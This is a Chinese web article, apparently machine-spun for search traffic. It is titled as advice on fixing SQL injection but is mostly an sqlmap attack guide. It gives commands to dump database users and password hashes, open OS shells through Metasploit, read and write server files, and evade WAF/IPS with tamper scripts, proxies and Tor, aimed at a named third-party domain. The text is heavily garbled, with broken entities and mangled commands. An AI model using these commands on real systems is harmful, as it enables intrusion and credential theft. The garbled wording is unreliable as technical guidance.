sql注入怎么解决,鼠标sql怎么解决

你想知道sql注入怎么解决和关于鼠标sql怎么解决吗?小编带你了解一下关于大家都关心的话题。

sql注入怎么解决

一.什麽是sql注射

  SQL注射是对比罕见的网络攻击方法之一,她不-是使用操作系统的BUG来完成袭击,而是针对程序员编辑时的忽略,经过SQL语句,完成无账号登录,以至窜改数据库啦。

两.SQL注射袭击的整体思绪

    寻求到SQL注射的地位
    断定服务器类别和靠山数据库类别
    针对区别的服务器和数据库特色举行SQL注射袭击
三.SQL注射袭击实例

String sql = &39; &34; &39; &34; &34;;--当输出了上边的用户名和钥匙号码,上边的SQL语句成为SELECT * FROM user_table WHERE username=&39;’&34;&39;&39; and password=&39;--其结果不言而喻…&34;&34;好使&34;好使&注射点 -f 获得数据库版本信息 -p 34;page,id&34;&指定数据库名 -T &34; 34;&指定字段 -s &34; 34;xx.log&34;xx.log&要实行的尝试水准品级,默许为1 --risk=(0-3) 耽误呼应,默许为5 --data 列出字段 --current-user 获得现在数据库称号 --users 数据库用户全部钥匙号码 --privileges 指定数据库用户 --dbs 34;&列出指定数据库中的表 --columns -T &34; -D &34; 列出一切数据库一切表 --exclude-sysdbs 34;&34;&34;&列出指定数据库的表的字段的数据(--dump -T users -D master -C surname) --dump -T &34; -D &34; --start 2 --top 4 指定数据库(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB) --os 一五一十的品级(0-6) 0只显现Python的回溯,差错和主要新闻呀。 1显示信息和告诫新闻拉。 2显现调试新闻了。 3有效载荷注射呢。 4显现HTTP恳求拉。 5显现HTTP呼应头拉。 6显现HTTP呼应页面的内容 --privileges 是还是不是数据库管理员 --roles 导入用户自定义函数(获得体系权限) --union-check union 查表纪录 --union-test 选用union 注射 --union-tech orderby 34;&POST方法提交数据(--data &34;) --cookie &34; 34;&运用referer欺诈(--referer &要写入的文件绝对路径 --os-cmd=id 体系交互shell --os-pwn matesploit绝对路径(--msf-path=/opt/framework/msf3/) --os-smbrelay --reg-read --time-sec= 34;user-agent&34;sqlmap/0.7rc1 (/1.txt -v 2 8./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-cmd &34; -v 1 9./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-shell --union-use -v 2 10./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 --priv-esc -v 1 11./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-pwn --msf-path=/opt/framework/msf3 -v 1 12./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --os-bof --msf-path=/opt/framework/msf3 -v 1 13./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --reg-add --reg-key=&34; --reg-value=Test --reg-type=REG_SZ --reg-data=1 14./sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -b --eta 15./sqlmap.py -u &34; -p id --prefix &39;)&34;AND (&39;=&34;16./sqlmap.py -u &34; --auth-type Basic --auth-cred &34;17./sqlmap.py -l burp.log --scope=&34;18./sqlmap.py -u &34; --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3 19./sqlmap.py -u &34; --sql-query &39;foo&34; -v 1 20./sqlmap.py -u &34; --common-tables -D testdb --banner 21./sqlmap.py -u &34; --cookie=&34; --string=&39; --dbs --level=3 -p &34;简易的注射流程 :1.读取数据库版本,现在用户,现在数据库 sqlmap -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db -v 1 2.判定现在数据库用户权限 sqlmap -u http://www.xxxxx.com/test.php?p=2 --privileges -U 用户名 -v 1 sqlmap -u http://www.xxxxx.com/test.php?p=2 --is-dba -U 用户名 -v 1 3.读取全部数据库用户或者指定数据库用户的钥匙号码 sqlmap -u http://www.xxxxx.com/test.php?p=2 --users --passwords -v 2 sqlmap -u http://www.xxxxx.com/test.php?p=2 --passwords -U root -v 2 4.获得全部数据库 sqlmap -u http://www.xxxxx.com/test.php?p=2 --dbs -v 2 5.获得指定数据库中的全部表 sqlmap -u http://www.xxxxx.com/test.php?p=2 --tables -D mysql -v 2 6.获得指定数据库名中指定表的字段 sqlmap -u http://www.xxxxx.com/test.php?p=2 --columns -D mysql -T users -v 2 7.获得指定数据库名中指定表中指定字段的数据 sqlmap -u http://www.xxxxx.com/test.php?p=2 --dump -D mysql -T users -C &34; -s &34; -v 2 8.file-read读取web文件 sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-read &34; -v 2 9.file-write写入文件到web sqlmap -u http://www.xxxxx.com/test.php?p=2 --file-write /localhost/mm.php --file运用sqlmap绕过防火墙举行注射尝试确认WAF

一开始的时候咋们推断该Web服务器能否被WAF/IPS/IDS守护着呀。这点很简单完成,由于咋们在漏扫或许运用特地器械来检测能否有WAF,这一个检测,在nmap的NSE,或许WVS的计谋或许APPSCAN的计谋中都有,能够使用这一些来判定拉。

在此,也推荐运用sqlmap 举行检测是不是有WAF/IPS/IDS

root@kali:~34;http://yiliao.kingdee.com/contents.php?id=51&types=4&首选

root@kali:~34;http://yiliao.kingdee.com/contents.php?id=51&types=4&备选运用参数举行绕过

sqlmap -u &34; --random-agent -v 2

sqlmap -u &34; --delay=3.5 --time-sec=60

sqlmap -u &34; --proxy=211.211.211.211:8080 --proxy-cred=211:985

sqlmap -u &34; --ignore-proxy

sqlmap -u &34; --flush-session

sqlmap -u &34; --hex

sqlmap -u &34; --mobile

sqlmap -u &34; --tor运用脚-本举行绕过运用样式

root@kali:~34;http://yiliao.kingdee.com/contents.php?id=51&types=4&脚-本A,脚-本B 脚-本效果


    apostrophemask.py34;1 AND &39;=&34;) &39;

      equaltolike.pyMySQL中绕过过滤’>’ ,用GREATEST交换大于号;

    Example: (&39;) &39;


      space2hash.py号 随机字符串 和换行符;

    Input: 1 AND 9227=9227;Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227


      apostrophenullencode.py当数据库为mysql时绕过防火墙,每一个关键字以前增添mysql版本谈论;
      space2morehash.py号 和更多随机字符串 换行符;

        appendnullbyte.py39;1 AND 1=1&39;1 AND 1=1%00&MySQL,SQLite (possibly),SAP MaxDB绕过对 IFNULL 过滤了。 交换相似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’
        space2mssqlblank.py(mssql)用base64编码

      Example: (&39; AND SLEEP(5)34;) &39; Requirement: all


        space2mssqlhash.py(mysql中过滤空格,包罗完好的查版本解释;Example: (&39;) &39;
        space2mysqlblank.pyMS SQL 2005,MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0顶用between交换大于号(>)
        space2mysqldash.py环绕SQL关键字增加多个空格;

      Example: (&39;) &39;


        space2plus.py39;SELECT id FROM users&39;SELECT+id+FROM+users&MySQL 5.1, SGOS取代空格字符后与一位有用的随机空缺字符的SQL语句啦。 随后交换=为like
        nonrecursivereplacement.py取代空格字符(“”)从一位随机的空缺字符可选字符的有用集
        sp_password.py双url编码(不处置以编码的)

        unionalltounion.py39;-1 UNION ALL SELECT&39;-1 UNION SELECT&Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0url编码;
        randomcase.py宽字符绕过 GPC addslashes;

      Example: * Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20


        randomcomments.pyASP,ASP.NET中字符串 unicode 编码;
        securesphere.py39;1 AND 1=1&34;1 AND 1=1 and &39;=&39;&MySQL >= 5.1.13解释绕过

        space2comment.pyMySQL < 5.1中关键字前加解释
      脚-本参数组合计谋绕过mysql绕过

      root@kali:~34;http://yiliao.kingdee.com/contents.php?id=51&types=4& sqlmap -u &34; --random-agent --hpp --tamper=space2mysqldash.p,versionedmorekeywords.pyroot@kali:~34;http://yiliao.kingdee.com/contents.php?id=51&types=4&34; Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=apostrophemask.py,equaltolike.py

      备注这一些组合计谋能够依照注射的反应信息,实时调理组合计谋

      mssql绕过

      root@kali:~34;http://yiliao.kingdee.com/contents.php?id=51&types=4&34; Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=randomcase.py,charencode.pyroot@kali:~34;http://yiliao.kingdee.com/contents.php?id=51&types=4& sqlmap -u &34; --delay=3.5 --time-sec=120 --tamper=space2mssqlblank.py,securesphere.pyroot@kali:~34;http://yiliao.kingdee.com/contents.php?id=51&types=4& sqlmap -u &34; --delay=3.5 --random-agent --tamper=appendnullbyte.py,space2plus.pyroot@kali:~34;http://yiliao.kingdee.com/contents.php?id=51&types=4& sqlmap -u &34; --delay=5 --random-agent --hpp --tamper=unmagicquotes.py,unionalltounion.pyroot@kali:~34;http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=5--user-agent =“Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0” --hpp --tamper=charunicodeencode.py,chardoubleencode.py想法导图

      最终,谢谢我们的观-看,感谢我们的支撑,能点赞关心最棒啦!

      假如短文有疑能够关心私信我交换变动,或者在谈论区相互交换呀。

      关于sql注入怎么解决的话题,和一些鼠标sql怎么解决相关题,解完毕,希望帮帮助到大家。

除非特别注明,本站所有文字均为原创文章,作者:admin

No Comment

留言

电子邮件地址不会被公开。 必填项已用*标注

感谢你的留言。。。